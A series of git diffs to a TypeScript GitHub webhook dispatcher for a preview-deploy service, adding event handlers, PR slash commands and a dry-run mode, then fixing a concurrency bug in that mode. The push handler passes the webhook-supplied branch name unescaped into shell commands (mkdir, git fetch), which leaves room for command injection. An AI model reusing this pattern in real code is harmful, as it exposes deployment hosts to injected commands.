-      case 'check_run':
-        return this.handleCheckRun(payload as GitHubCheckRunEvent);
-      case 'pull_request':
-        return this.handlePullRequest(payload as GitHubPullRequestEvent);
-      case 'issue_comment':
-        return this.handleIssueComment(payload as GitHubIssueCommentEvent);
-      case 'delete':
-        return this.handleDelete(payload as GitHubDeleteEvent);
-      case 'repository':
-        return this.handleRepository(payload as GitHubRepositoryEvent);
-      case 'release':
-        return this.handleRelease(payload as GitHubReleaseEvent);
-      default:
-        return { action: 'ignored-event', message: `Unhandled event type '${eventName}'` };
+  /**
+   * Dispatch a webhook event. The `dryRun` option is set by the
+   * `/api/github/webhook/self-test` endpoint to skip all state
+   * mutations (addBranch / updateProject / worktree create / save).
+   * Parsing and routing logic still runs so the result accurately
+   * describes what a REAL webhook would have triggered — just without
+   * creating files on disk or writing to state.json.
+   */
+  private _dryRun = false;
+  async handle(
+    eventName: string,
+    payload: unknown,
+    options?: { dryRun?: boolean },
+  ): Promise<WebhookDispatchResult> {
+    this._dryRun = options?.dryRun === true;
+    try {
+      switch (eventName) {
+        case 'ping':
+          return { action: 'ignored-ping', message: 'pong' };
+        case 'push':
+          return await this.handlePush(payload as GitHubPushEvent);
+        case 'installation':
+          return await this.handleInstallation(payload as GitHubInstallationEvent);
+        case 'installation_repositories':
+          return await this.handleInstallationRepos(payload as GitHubInstallationReposEvent);
+        case 'check_run':
+          return await this.handleCheckRun(payload as GitHubCheckRunEvent);
+        case 'pull_request':
+          return await this.handlePullRequest(payload as GitHubPullRequestEvent);
+        case 'issue_comment':
+          return await this.handleIssueComment(payload as GitHubIssueCommentEvent);
+        case 'delete':
+          return await this.handleDelete(payload as GitHubDeleteEvent);
+        case 'repository':
+          return await this.handleRepository(payload as GitHubRepositoryEvent);
+        case 'release':
+          return await this.handleRelease(payload as GitHubReleaseEvent);
+        default:
+          return { action: 'ignored-event', message: `Unhandled event type '${eventName}'` };
+      }
+    } finally {
+      this._dryRun = false;
     }
+  }
+
+  /**
+   * Guard for state-mutating ops: honored by every handler that
+   * would otherwise call addBranch/updateProject/worktree.create.
+   * When true, the handler returns its result as if the mutation
+   * happened (for accurate self-test output) but skips writes.
+   */
+  private get dryRun(): boolean {
+    return this._dryRun;
   }
 
   /**
@@ -421,15 +449,17 @@ export class GitHubWebhookDispatcher {
     // new name — kept detached for now so the operator explicitly
     // re-binds via the UI, avoiding silent cross-wiring.
     if (event.action === 'deleted' || event.action === 'renamed' || event.action === 'transferred') {
-      this.deps.stateService.updateProject(project.id, {
-        githubRepoFullName: undefined,
-        githubInstallationId: undefined,
-        githubAutoDeploy: undefined,
-        githubLinkedAt: undefined,
-      });
+      if (!this.dryRun) {
+        this.deps.stateService.updateProject(project.id, {
+          githubRepoFullName: undefined,
+          githubInstallationId: undefined,
+          githubAutoDeploy: undefined,
+          githubLinkedAt: undefined,
+        });
+      }
       return {
         action: event.action === 'deleted' ? 'repo-detached' : 'repo-renamed',
-        message: `Project '${project.name}' unlinked because repository.${event.action} (${currentFullName})`,
+        message: `${this.dryRun ? '[dry-run] ' : ''}Project '${project.name}' unlinked because repository.${event.action} (${currentFullName})`,
       };
     }
     return { action: 'ignored-event', message: `repository.${event.action} acknowledged` };
@@ -500,7 +530,7 @@ export class GitHubWebhookDispatcher {
     // route-layer comment poster has it, and let the push handler (which
     // already runs in parallel from synchronize) drive the deploy.
     if (event.action === 'opened' || event.action === 'reopened') {
-      if (entry) {
+      if (entry && !this.dryRun) {
         this.deps.stateService.updateBranchGithubMeta(branchId, {
           githubPrNumber: event.pull_request.number,
           githubInstallationId: project.githubInstallationId ?? event.installation?.id,
@@ -510,7 +540,7 @@ export class GitHubWebhookDispatcher {
       }
       return {
         action: 'pr-comment-posted',
-        message: `PR #${event.pull_request.number} ${event.action}; marked branch '${branchId}' for comment`,
+        message: `${this.dryRun ? '[dry-run] ' : ''}PR #${event.pull_request.number} ${event.action}; marked branch '${branchId}' for comment`,
         branchId,
       };
     }
@@ -591,6 +621,17 @@ export class GitHubWebhookDispatcher {
         };
       }
 
+      if (this.dryRun) {
+        // In dry-run we return the shape of "would-create" without
+        // touching disk or state — self-test wants accurate signals.
+        return {
+          action: 'branch-created',
+          message: `[dry-run] Would create branch '${branchId}' from push at ${commitSha.slice(0, 7)}`,
+          branchId,
+          deployRequest: { branchId, commitSha },
+        };
+      }
+
       const repoRoot = this.deps.stateService.getProjectRepoRoot(project.id, this.deps.config.repoRoot);
       const worktreePath = (await import('./worktree.js')).WorktreeService.worktreePathFor(
         this.deps.config.worktreeBase,
@@ -619,6 +660,15 @@ export class GitHubWebhookDispatcher {
       };
       this.deps.stateService.addBranch(entry);
       created = true;
+    }
+
+    if (this.dryRun) {
+      return {
+        action: created ? 'branch-created' : 'branch-refreshed',
+        message: `[dry-run] Would stamp ${commitSha.slice(0, 7)} on '${branchId}'`,
+        branchId,
+        deployRequest: { branchId, commitSha },
+      };
     }
 
     // Stamp GitHub metadata on the branch so the deploy route and check-run
@@ -663,7 +713,7 @@ export class GitHubWebhookDispatcher {
     }
     // If a repo was removed from the installation AND it's linked to a
     // project, detach the link so webhooks for it stop triggering deploys.
-    if (event.action === 'removed') {
+    if (event.action === 'removed' && !this.dryRun) {
       for (const repo of event.repositories_removed || []) {
         const project = this.deps.stateService.findProjectByRepoFullName(repo.full_name);
         if (project && project.githubInstallationId === instId) {
@@ -691,11 +741,13 @@ export class GitHubWebhookDispatcher {
     const entry = this.deps.stateService.getBranch(branchId);
     if (!entry) return { action: 'ignored-event', message: `check_run branch '${branchId}' not found` };
     const commitSha = event.check_run!.head_sha;
-    this.deps.stateService.updateBranchGithubMeta(branchId, { githubCommitSha: commitSha });
-    this.deps.stateService.save();
+    if (!this.dryRun) {
+      this.deps.stateService.updateBranchGithubMeta(branchId, { githubCommitSha: commitSha });
+      this.deps.stateService.save();
+    }
     return {
       action: 'check-run-requeued',
-      message: `Queued redeploy of '${branchId}' at ${commitSha.slice(0, 7)}`,
+      message: `${this.dryRun ? '[dry-run] ' : ''}Queued redeploy of '${branchId}' at ${commitSha.slice(0, 7)}`,
       branchId,
       deployRequest: { branchId, commitSha },
     };

--- a/cds/src/services/github-webhook-dispatcher.ts
+++ b/cds/src/services/github-webhook-dispatcher.ts
@@ -39,7 +39,12 @@ export interface WebhookDispatchResult {
     | 'installation-acknowledged'
     | 'check-run-requeued'
     | 'pr-comment-posted'
-    | 'pr-branch-stopped';
+    | 'pr-branch-stopped'
+    | 'slash-command-invoked'
+    | 'branch-deleted'
+    | 'repo-renamed'
+    | 'repo-detached'
+    | 'release-acknowledged';
   /** Short human message for the response + logs. */
   message: string;
   /** Populated when a branch was touched. */
@@ -50,12 +55,25 @@ export interface WebhookDispatchResult {
     commitSha: string;
   };
   /**
-   * Populated on `pull_request.closed` to ask the route to tear down the
-   * preview containers. Separate from deployRequest so the route decides
-   * between "deploy" and "stop".
+   * Populated on `pull_request.closed` or `delete` (branch) to ask the
+   * route to tear down the preview containers. Separate from
+   * deployRequest so the route decides between "deploy" and "stop".
    */
   stopRequest?: {
     branchId: string;
+  };
+  /**
+   * Populated on slash-command events (`/cds <cmd>` in issue_comment).
+   * The route layer wires the command to the right action + posts a
+   * reply comment on the PR.
+   */
+  slashCommand?: {
+    command: 'redeploy' | 'stop' | 'logs' | 'help' | 'unknown';
+    branchId?: string;
+    prNumber: number;
+    commentId: number;
+    arg?: string;
+    commenter: string;
   };
 }
 
@@ -116,6 +134,78 @@ export interface GitHubPullRequestEvent {
   installation?: { id: number };
 }
 
+/**
+ * `issue_comment` event — GitHub fires this for BOTH issue and PR
+ * comments (PR is an issue under the hood). We only act on comments
+ * where `issue.pull_request` is set (meaning it's a PR comment) AND
+ * the body matches our `/cds <cmd>` slash-command pattern.
+ */
+export interface GitHubIssueCommentEvent {
+  action: 'created' | 'edited' | 'deleted';
+  comment?: {
+    id: number;
+    body: string;
+    user: { login: string };
+  };
+  issue?: {
+    number: number;
+    pull_request?: { url: string; html_url: string };
+  };
+  repository?: { full_name: string };
+  installation?: { id: number };
+}
+
+/**
+ * `delete` event — fires when a branch or tag is deleted on GitHub
+ * (push of an empty ref). We care about branches so we can tear down
+ * their preview containers on CDS.
+ */
+export interface GitHubDeleteEvent {
+  ref: string;
+  ref_type: 'branch' | 'tag';
+  repository?: { full_name: string };
+  installation?: { id: number };
+}
+
+/**
+ * `repository` event — fires on repo-level lifecycle changes
+ * (renamed, transferred, archived, edited, deleted). We auto-unlink
+ * projects that reference a repo that's been renamed or removed so
+ * the link dictionary doesn't accumulate stale entries.
+ */
+export interface GitHubRepositoryEvent {
+  action: 'created' | 'deleted' | 'renamed' | 'transferred' | 'archived' | 'unarchived' | 'edited' | 'publicized' | 'privatized';
+  repository?: {
+    full_name: string;
+    name: string;
+    owner: { login: string };
+  };
+  changes?: {
+    repository?: {
+      name?: { from: string };
+      owner?: { from: { user?: { login: string }; organization?: { login: string } } };
+    };
+  };
+  installation?: { id: number };
+}
+
+/**
+ * `release` event — currently acknowledged but not wired to a deploy
+ * action. Hook for a future production-tag deploy feature.
+ */
+export interface GitHubReleaseEvent {
+  action: 'published' | 'created' | 'edited' | 'deleted' | 'prereleased' | 'released';
+  release?: {
+    tag_name: string;
+    name: string;
+    html_url: string;
+    draft: boolean;
+    prerelease: boolean;
+  };
+  repository?: { full_name: string };
+  installation?: { id: number };
+}
+
 export interface WebhookDispatcherDeps {
   stateService: StateService;
   worktreeService: WorktreeService;
@@ -146,9 +236,181 @@ export class GitHubWebhookDispatcher {
         return this.handleCheckRun(payload as GitHubCheckRunEvent);
       case 'pull_request':
         return this.handlePullRequest(payload as GitHubPullRequestEvent);
+      case 'issue_comment':
+        return this.handleIssueComment(payload as GitHubIssueCommentEvent);
+      case 'delete':
+        return this.handleDelete(payload as GitHubDeleteEvent);
+      case 'repository':
+        return this.handleRepository(payload as GitHubRepositoryEvent);
+      case 'release':
+        return this.handleRelease(payload as GitHubReleaseEvent);
       default:
         return { action: 'ignored-event', message: `Unhandled event type '${eventName}'` };
     }
+  }
+
+  /**
+   * Parse a slash command from a PR comment body. Format:
+   *   /cds <command> [arg…]
+   * Leading whitespace tolerated. Only the FIRST line is inspected so a
+   * comment like "/cds redeploy\n\nThis should force a new build" still
+   * parses as a redeploy command.
+   */
+  private parseSlashCommand(body: string): { command: WebhookDispatchResult['slashCommand'] extends infer R ? R extends { command: infer C } ? C : never : never; arg?: string } | null {
+    if (!body) return null;
+    const firstLine = body.split(/\r?\n/)[0].trim();
+    const match = firstLine.match(/^\/cds(?:\s+(\S+))?(?:\s+(.*))?$/i);
+    if (!match) return null;
+    const cmd = (match[1] || 'help').toLowerCase();
+    const arg = match[2]?.trim() || undefined;
+    if (cmd === 'redeploy' || cmd === 'rebuild' || cmd === 'deploy') return { command: 'redeploy', arg };
+    if (cmd === 'stop' || cmd === 'pause' || cmd === 'shutdown') return { command: 'stop', arg };
+    if (cmd === 'logs' || cmd === 'log' || cmd === 'tail') return { command: 'logs', arg };
+    if (cmd === 'help' || cmd === '?' || cmd === '-h') return { command: 'help', arg };
+    return { command: 'unknown', arg: cmd };
+  }
+
+  /**
+   * Resolve the CDS branchId associated with a PR. We stored
+   * githubPrNumber on the branch entry when the PR was opened, so we
+   * walk the branches list for that project looking for a match.
+   * Falls back to null if no branch found (comment on a PR CDS doesn't
+   * track yet — maybe the user linked the repo after PR was open).
+   */
+  private findBranchForPr(projectId: string, prNumber: number): string | null {
+    const branches = this.deps.stateService.getBranchesForProject(projectId);
+    const hit = branches.find((b) => b.githubPrNumber === prNumber);
+    return hit ? hit.id : null;
+  }
+
+  /**
+   * Handle `issue_comment.created` events. We only act when the comment
+   * is on a PR (issue.pull_request is set) and starts with `/cds`.
+   * The route layer does the actual work (triggering deploy / stop /
+   * posting reply) because those all need the GitHubAppClient.
+   */
+  private async handleIssueComment(event: GitHubIssueCommentEvent): Promise<WebhookDispatchResult> {
+    if (event.action !== 'created') {
+      return { action: 'ignored-event', message: `issue_comment.${event.action} ignored` };
+    }
+    if (!event.issue?.pull_request || !event.comment || !event.repository) {
+      return { action: 'ignored-event', message: 'issue_comment not on a PR or missing fields' };
+    }
+    const parsed = this.parseSlashCommand(event.comment.body);
+    if (!parsed) {
+      return { action: 'ignored-event', message: 'comment not a /cds slash command' };
+    }
+    const repoFullName = event.repository.full_name;
+    const project = this.deps.stateService.findProjectByRepoFullName(repoFullName);
+    if (!project) {
+      return { action: 'ignored-no-project', message: `No project linked to ${repoFullName}` };
+    }
+    const branchId = this.findBranchForPr(project.id, event.issue.number) || undefined;
+    return {
+      action: 'slash-command-invoked',
+      message: `/cds ${parsed.command} invoked by @${event.comment.user.login} on PR #${event.issue.number}`,
+      branchId,
+      slashCommand: {
+        command: parsed.command,
+        branchId,
+        prNumber: event.issue.number,
+        commentId: event.comment.id,
+        arg: parsed.arg,
+        commenter: event.comment.user.login,
+      },
+    };
+  }
+
+  /**
+   * `delete` event — branch or tag removed on GitHub. For branches we
+   * stop the corresponding CDS preview container so the user deleting
+   * on GitHub's side automatically cleans up CDS too.
+   */
+  private async handleDelete(event: GitHubDeleteEvent): Promise<WebhookDispatchResult> {
+    if (event.ref_type !== 'branch') {
+      return { action: 'ignored-event', message: `delete ref_type=${event.ref_type} ignored` };
+    }
+    if (!event.repository) {
+      return { action: 'ignored-event', message: 'delete event missing repository' };
+    }
+    const project = this.deps.stateService.findProjectByRepoFullName(event.repository.full_name);
+    if (!project) {
+      return { action: 'ignored-no-project', message: `No project linked to ${event.repository.full_name}` };
+    }
+    const slugified = StateServiceClass.slugify(event.ref);
+    const branchId = project.legacyFlag ? slugified : `${project.slug}-${slugified}`;
+    const entry = this.deps.stateService.getBranch(branchId);
+    if (!entry) {
+      return { action: 'ignored-event', message: `branch deleted on GitHub but not tracked by CDS: ${branchId}` };
+    }
+    return {
+      action: 'branch-deleted',
+      message: `GitHub branch '${event.ref}' deleted; stopping CDS preview '${branchId}'`,
+      branchId,
+      stopRequest: { branchId },
+    };
+  }
+
+  /**
+   * `repository` event — repo renamed, transferred, archived, deleted.
+   * We defensively detach the link in each of these cases rather than
+   * trying to auto-rename (rename could also collide with another
+   * project's linkage). The operator can re-link via the UI after.
+   */
+  private async handleRepository(event: GitHubRepositoryEvent): Promise<WebhookDispatchResult> {
+    if (!event.repository) {
+      return { action: 'ignored-event', message: 'repository event missing payload' };
+    }
+    const currentFullName = event.repository.full_name;
+    // Try to find a project matching either the new OR the old full name
+    // (renamed/transferred events pass the new name in repository but
+    // include the old name in changes.repository.{name,owner}).
+    let project = this.deps.stateService.findProjectByRepoFullName(currentFullName);
+    if (!project && event.action === 'renamed') {
+      const oldName = event.changes?.repository?.name?.from;
+      if (oldName) {
+        const owner = event.repository.owner.login;
+        project = this.deps.stateService.findProjectByRepoFullName(`${owner}/${oldName}`);
+      }
+    }
+    if (!project && event.action === 'transferred') {
+      const oldOwner = event.changes?.repository?.owner?.from?.user?.login
+        || event.changes?.repository?.owner?.from?.organization?.login;
+      if (oldOwner) {
+        project = this.deps.stateService.findProjectByRepoFullName(`${oldOwner}/${event.repository.name}`);
+      }
+    }
+    if (!project) {
+      return { action: 'ignored-event', message: `repository.${event.action} for ${currentFullName} — no linked project` };
+    }
+
+    // For destructive actions, detach entirely so the stale link doesn't
+    // accept future webhooks. For a rename, we COULD auto-update to the
+    // new name — kept detached for now so the operator explicitly
+    // re-binds via the UI, avoiding silent cross-wiring.
+    if (event.action === 'deleted' || event.action === 'renamed' || event.action === 'transferred') {
+      this.deps.stateService.updateProject(project.id, {
+        githubRepoFullName: undefined,
+        githubInstallationId: undefined,
+        githubAutoDeploy: undefined,
+        githubLinkedAt: undefined,
+      });
+      return {
+        action: event.action === 'deleted' ? 'repo-detached' : 'repo-renamed',
+        message: `Project '${project.name}' unlinked because repository.${event.action} (${currentFullName})`,
+      };
+    }
+    return { action: 'ignored-event', message: `repository.${event.action} acknowledged` };
+  }
+
+  /**
+   * `release` event — currently just acknowledged. Future: trigger a
+   * production-flavored deploy on `released` / `published` action, pin
+   * a specific build profile ("prod"), or post a release-notes comment.
+   */
+  private async handleRelease(event: GitHubReleaseEvent): Promise<WebhookDispatchResult> {
+    const tag = event.release?.tag_name || '?';
+    return { action: 'release-acknowledged', message: `release.${event.action} (${tag}) — future: production deploy` };
   }
 
   /**

--- a/cds/src/services/github-webhook-dispatcher.ts
+++ b/cds/src/services/github-webhook-dispatcher.ts
@@ -1,0 +1,300 @@
+/**
+ * GitHubWebhookDispatcher — processes an already-verified GitHub webhook
+ * and translates it into CDS state changes.
+ *
+ * Kept separate from the Express route so unit tests can exercise the
+ * business logic without spinning up a server + HTTP client. The route
+ * is a thin shell that verifies the HMAC and delegates here.
+ *
+ * Supported events (v1):
+ *   - `ping`                     — health check, no-op
+ *   - `push`                     — auto-create+deploy branch, post check run
+ *   - `installation`             — log/refresh installation id for matching projects
+ *   - `installation_repositories`— adjust which repos an installation covers
+ *   - `check_run.rerequested`    — re-run the deploy that produced this check
+ *
+ * Unknown events return a soft 'ignored' so GitHub doesn't retry the
+ * delivery (those retries fill the App's webhook delivery log with noise).
+ */
+
+import type { StateService } from './state.js';
+import type { WorktreeService } from './worktree.js';
+import type { IShellExecutor, CdsConfig, BranchEntry } from '../types.js';
+import type { GitHubAppClient } from './github-app-client.js';
+import path from 'node:path';
+import { StateService as StateServiceClass } from './state.js';
+
+export interface WebhookDispatchResult {
+  /** Machine-readable outcome. */
+  action:
+    | 'ignored-no-project'
+    | 'ignored-delete'
+    | 'ignored-non-branch'
+    | 'ignored-non-push-branch'
+    | 'ignored-auto-deploy-off'
+    | 'ignored-ping'
+    | 'ignored-event'
+    | 'branch-created'
+    | 'branch-refreshed'
+    | 'installation-acknowledged'
+    | 'check-run-requeued';
+  /** Short human message for the response + logs. */
+  message: string;
+  /** Populated when a branch was touched. */
+  branchId?: string;
+  /** Populated when a deploy should be fired after the dispatcher returns. */
+  deployRequest?: {
+    branchId: string;
+    commitSha: string;
+  };
+}
+
+export interface GitHubPushEvent {
+  ref?: string;
+  /** `true` when the push deletes the ref — we ignore those. */
+  deleted?: boolean;
+  before?: string;
+  after?: string;
+  repository?: {
+    id: number;
+    full_name: string;
+    default_branch?: string;
+  };
+  installation?: { id: number };
+  head_commit?: { id: string; message: string } | null;
+  sender?: { login: string };
+}
+
+export interface GitHubInstallationEvent {
+  action: 'created' | 'deleted' | 'new_permissions_accepted' | 'suspend' | 'unsuspend';
+  installation?: { id: number; account?: { login: string } };
+  repositories?: Array<{ full_name: string }>;
+}
+
+export interface GitHubInstallationReposEvent {
+  action: 'added' | 'removed';
+  installation?: { id: number };
+  repositories_added?: Array<{ full_name: string }>;
+  repositories_removed?: Array<{ full_name: string }>;
+}
+
+export interface GitHubCheckRunEvent {
+  action: 'created' | 'completed' | 'rerequested' | 'requested_action';
+  check_run?: {
+    id: number;
+    head_sha: string;
+    external_id?: string;
+    check_suite: { id: number };
+  };
+  repository?: { full_name: string };
+  installation?: { id: number };
+}
+
+export interface WebhookDispatcherDeps {
+  stateService: StateService;
+  worktreeService: WorktreeService;
+  shell: IShellExecutor;
+  config: CdsConfig;
+  githubApp?: GitHubAppClient;
+}
+
+export class GitHubWebhookDispatcher {
+  constructor(private readonly deps: WebhookDispatcherDeps) {}
+
+  /**
+   * Entry point. `eventName` comes from the `X-GitHub-Event` header.
+   * The caller is responsible for HMAC verification — signatures that
+   * don't match must be rejected BEFORE reaching this method.
+   */
+  async handle(eventName: string, payload: unknown): Promise<WebhookDispatchResult> {
+    switch (eventName) {
+      case 'ping':
+        return { action: 'ignored-ping', message: 'pong' };
+      case 'push':
+        return this.handlePush(payload as GitHubPushEvent);
+      case 'installation':
+        return this.handleInstallation(payload as GitHubInstallationEvent);
+      case 'installation_repositories':
+        return this.handleInstallationRepos(payload as GitHubInstallationReposEvent);
+      case 'check_run':
+        return this.handleCheckRun(payload as GitHubCheckRunEvent);
+      default:
+        return { action: 'ignored-event', message: `Unhandled event type '${eventName}'` };
+    }
+  }
+
+  private async handlePush(event: GitHubPushEvent): Promise<WebhookDispatchResult> {
+    if (!event.ref || !event.repository) {
+      return { action: 'ignored-non-push-branch', message: 'Push payload missing ref/repository' };
+    }
+    // Delete pushes arrive with after='00..0' and we deliberately skip them
+    // BEFORE requiring `after` because GitHub's delete event semantically
+    // has no "new SHA". Checked before the ref-kind guard so delete-of-tag
+    // still returns ignored-delete (more informative than ignored-non-branch).
+    if (event.deleted) {
+      return { action: 'ignored-delete', message: `Branch delete ignored (ref=${event.ref})` };
+    }
+    if (!event.after) {
+      return { action: 'ignored-non-push-branch', message: 'Push payload missing after SHA' };
+    }
+    // ref is "refs/heads/<branch>" for branch pushes, "refs/tags/<tag>" for tags.
+    if (!event.ref.startsWith('refs/heads/')) {
+      return { action: 'ignored-non-branch', message: `Non-branch ref ignored (${event.ref})` };
+    }
+    const branchName = event.ref.substring('refs/heads/'.length);
+    const commitSha = event.after;
+    const repoFullName = event.repository.full_name;
+
+    const project = this.deps.stateService.findProjectByRepoFullName(repoFullName);
+    if (!project) {
+      return {
+        action: 'ignored-no-project',
+        message: `No project linked to ${repoFullName}. Ignoring push.`,
+      };
+    }
+
+    if (project.githubAutoDeploy === false) {
+      return {
+        action: 'ignored-auto-deploy-off',
+        message: `Project '${project.name}' has autoDeploy=off. Ignoring push.`,
+      };
+    }
+
+    // Ensure branch exists — auto-create a worktree when the push hits a
+    // branch CDS hasn't tracked yet. Uses the same id convention as the
+    // `POST /branches` route (legacy projects use the bare slug, named
+    // projects prefix with the project slug) so frontend URLs match.
+    const slugified = StateServiceClass.slugify(branchName);
+    const branchId = project.legacyFlag ? slugified : `${project.slug}-${slugified}`;
+    let entry = this.deps.stateService.getBranch(branchId);
+    let created = false;
+
+    if (!entry) {
+      // Refuse to auto-clone if the project's own clone isn't ready yet —
+      // matches the guard in POST /branches so a webhook racing against a
+      // slow first-clone doesn't leave us in a half-state.
+      if (project.cloneStatus && project.cloneStatus !== 'ready') {
+        return {
+          action: 'ignored-no-project',
+          message: `Project '${project.name}' clone not ready (${project.cloneStatus}). Skipping push.`,
+        };
+      }
+
+      const repoRoot = this.deps.stateService.getProjectRepoRoot(project.id, this.deps.config.repoRoot);
+      const worktreePath = (await import('./worktree.js')).WorktreeService.worktreePathFor(
+        this.deps.config.worktreeBase,
+        project.id,
+        branchId,
+      );
+      await this.deps.shell.exec(`mkdir -p "${path.posix.dirname(worktreePath)}"`);
+      try {
+        await this.deps.worktreeService.create(repoRoot, branchName, worktreePath);
+      } catch (err) {
+        // A push for a branch our local clone hasn't fetched yet can fail
+        // because `git worktree add` refuses unknown refs. Try a fetch and
+        // retry once; give up if that also fails.
+        await this.deps.shell.exec(`git fetch origin "${branchName}":"${branchName}"`, { cwd: repoRoot }).catch(() => {});
+        await this.deps.worktreeService.create(repoRoot, branchName, worktreePath);
+        void err;
+      }
+      entry = {
+        id: branchId,
+        projectId: project.id,
+        branch: branchName,
+        worktreePath,
+        services: {},
+        status: 'idle',
+        createdAt: new Date().toISOString(),
+      };
+      this.deps.stateService.addBranch(entry);
+      created = true;
+    }
+
+    // Stamp GitHub metadata on the branch so the deploy route and check-run
+    // hooks can find the repo + installation without re-walking the project.
+    this.deps.stateService.updateBranchGithubMeta(branchId, {
+      githubRepoFullName: repoFullName,
+      githubCommitSha: commitSha,
+      githubInstallationId: project.githubInstallationId ?? event.installation?.id,
+    });
+    this.deps.stateService.save();
+
+    return {
+      action: created ? 'branch-created' : 'branch-refreshed',
+      message: created
+        ? `Created branch '${branchId}' from push at ${commitSha.slice(0, 7)}`
+        : `Refreshed branch '${branchId}' with push ${commitSha.slice(0, 7)}`,
+      branchId,
+      deployRequest: { branchId, commitSha },
+    };
+  }
+
+  private async handleInstallation(event: GitHubInstallationEvent): Promise<WebhookDispatchResult> {
+    const instId = event.installation?.id;
+    if (!instId) {
+      return { action: 'ignored-event', message: 'installation event missing installation.id' };
+    }
+    // We don't auto-link projects on `installation` — the operator picks
+    // a specific repo via the Settings UI. The event is acknowledged so
+    // the App's delivery log is clean.
+    return {
+      action: 'installation-acknowledged',
+      message: `Installation ${event.action} for id=${instId}`,
+    };
+  }
+
+  private async handleInstallationRepos(
+    event: GitHubInstallationReposEvent,
+  ): Promise<WebhookDispatchResult> {
+    const instId = event.installation?.id;
+    if (!instId) {
+      return { action: 'ignored-event', message: 'installation_repositories missing installation.id' };
+    }
+    // If a repo was removed from the installation AND it's linked to a
+    // project, detach the link so webhooks for it stop triggering deploys.
+    if (event.action === 'removed') {
+      for (const repo of event.repositories_removed || []) {
+        const project = this.deps.stateService.findProjectByRepoFullName(repo.full_name);
+        if (project && project.githubInstallationId === instId) {
+          this.deps.stateService.updateProject(project.id, {
+            githubRepoFullName: undefined,
+            githubInstallationId: undefined,
+            githubAutoDeploy: undefined,
+            githubLinkedAt: undefined,
+          });
+        }
+      }
+    }
+    return {
+      action: 'installation-acknowledged',
+      message: `installation_repositories ${event.action}`,
+    };
+  }
+
+  private async handleCheckRun(event: GitHubCheckRunEvent): Promise<WebhookDispatchResult> {
+    if (event.action !== 'rerequested') {
+      return { action: 'ignored-event', message: `check_run ${event.action} ignored` };
+    }
+    const branchId = event.check_run?.external_id;
+    if (!branchId) return { action: 'ignored-event', message: 'check_run missing external_id' };
+    const entry = this.deps.stateService.getBranch(branchId);
+    if (!entry) return { action: 'ignored-event', message: `check_run branch '${branchId}' not found` };
+    const commitSha = event.check_run!.head_sha;
+    this.deps.stateService.updateBranchGithubMeta(branchId, { githubCommitSha: commitSha });
+    this.deps.stateService.save();
+    return {
+      action: 'check-run-requeued',
+      message: `Queued redeploy of '${branchId}' at ${commitSha.slice(0, 7)}`,
+      branchId,
+      deployRequest: { branchId, commitSha },
+    };
+  }
+}
+
+/**
+ * Type guard the route uses to decide whether to kick off a deploy.
+ * Exported so mocks don't need to duplicate the check.
+ */
+export function shouldDispatchDeploy(result: WebhookDispatchResult): boolean {
+  return Boolean(result.deployRequest);
+}

--- a/cds/src/services/github-webhook-dispatcher.ts
+++ b/cds/src/services/github-webhook-dispatcher.ts
@@ -247,63 +247,51 @@ export class GitHubWebhookDispatcher {
   constructor(private readonly deps: WebhookDispatcherDeps) {}
 
   /**
-   * Entry point. `eventName` comes from the `X-GitHub-Event` header.
-   * The caller is responsible for HMAC verification — signatures that
-   * don't match must be rejected BEFORE reaching this method.
-   */
-  /**
    * Dispatch a webhook event. The `dryRun` option is set by the
    * `/api/github/webhook/self-test` endpoint to skip all state
    * mutations (addBranch / updateProject / worktree create / save).
    * Parsing and routing logic still runs so the result accurately
    * describes what a REAL webhook would have triggered — just without
    * creating files on disk or writing to state.json.
+   *
+   * IMPORTANT: dryRun flows through as a parameter to each handler,
+   * NOT as instance state. An earlier version stored it on `this`
+   * with a try/finally reset, but `handle()` has `await` suspension
+   * points — a concurrent self-test request could flip the instance
+   * flag to true while a real webhook was mid-flight, silently
+   * making the real request skip all state writes. Caught by Cursor
+   * Bugbot #450 round 4.
    */
-  private _dryRun = false;
   async handle(
     eventName: string,
     payload: unknown,
     options?: { dryRun?: boolean },
   ): Promise<WebhookDispatchResult> {
-    this._dryRun = options?.dryRun === true;
-    try {
-      switch (eventName) {
-        case 'ping':
-          return { action: 'ignored-ping', message: 'pong' };
-        case 'push':
-          return await this.handlePush(payload as GitHubPushEvent);
-        case 'installation':
-          return await this.handleInstallation(payload as GitHubInstallationEvent);
-        case 'installation_repositories':
-          return await this.handleInstallationRepos(payload as GitHubInstallationReposEvent);
-        case 'check_run':
-          return await this.handleCheckRun(payload as GitHubCheckRunEvent);
-        case 'pull_request':
-          return await this.handlePullRequest(payload as GitHubPullRequestEvent);
-        case 'issue_comment':
-          return await this.handleIssueComment(payload as GitHubIssueCommentEvent);
-        case 'delete':
-          return await this.handleDelete(payload as GitHubDeleteEvent);
-        case 'repository':
-          return await this.handleRepository(payload as GitHubRepositoryEvent);
-        case 'release':
-          return await this.handleRelease(payload as GitHubReleaseEvent);
-        default:
-          return { action: 'ignored-event', message: `Unhandled event type '${eventName}'` };
-      }
-    } finally {
-      this._dryRun = false;
+    const dryRun = options?.dryRun === true;
+    switch (eventName) {
+      case 'ping':
+        return { action: 'ignored-ping', message: 'pong' };
+      case 'push':
+        return this.handlePush(payload as GitHubPushEvent, dryRun);
+      case 'installation':
+        return this.handleInstallation(payload as GitHubInstallationEvent);
+      case 'installation_repositories':
+        return this.handleInstallationRepos(payload as GitHubInstallationReposEvent, dryRun);
+      case 'check_run':
+        return this.handleCheckRun(payload as GitHubCheckRunEvent, dryRun);
+      case 'pull_request':
+        return this.handlePullRequest(payload as GitHubPullRequestEvent, dryRun);
+      case 'issue_comment':
+        return this.handleIssueComment(payload as GitHubIssueCommentEvent);
+      case 'delete':
+        return this.handleDelete(payload as GitHubDeleteEvent);
+      case 'repository':
+        return this.handleRepository(payload as GitHubRepositoryEvent, dryRun);
+      case 'release':
+        return this.handleRelease(payload as GitHubReleaseEvent);
+      default:
+        return { action: 'ignored-event', message: `Unhandled event type '${eventName}'` };
     }
-  }
-
-  /**
-   * Guard for state-mutating ops: honored by every handler that
-   * would otherwise call addBranch/updateProject/worktree.create.
-   * When true, the handler returns its result as if the mutation
-   * happened (for accurate self-test output) but skips writes.
-   */
-  private get dryRun(): boolean {
-    return this._dryRun;
   }
 
   /**
@@ -417,7 +405,7 @@ export class GitHubWebhookDispatcher {
    * trying to auto-rename (rename could also collide with another
    * project's linkage). The operator can re-link via the UI after.
    */
-  private async handleRepository(event: GitHubRepositoryEvent): Promise<WebhookDispatchResult> {
+  private async handleRepository(event: GitHubRepositoryEvent, dryRun: boolean): Promise<WebhookDispatchResult> {
     if (!event.repository) {
       return { action: 'ignored-event', message: 'repository event missing payload' };
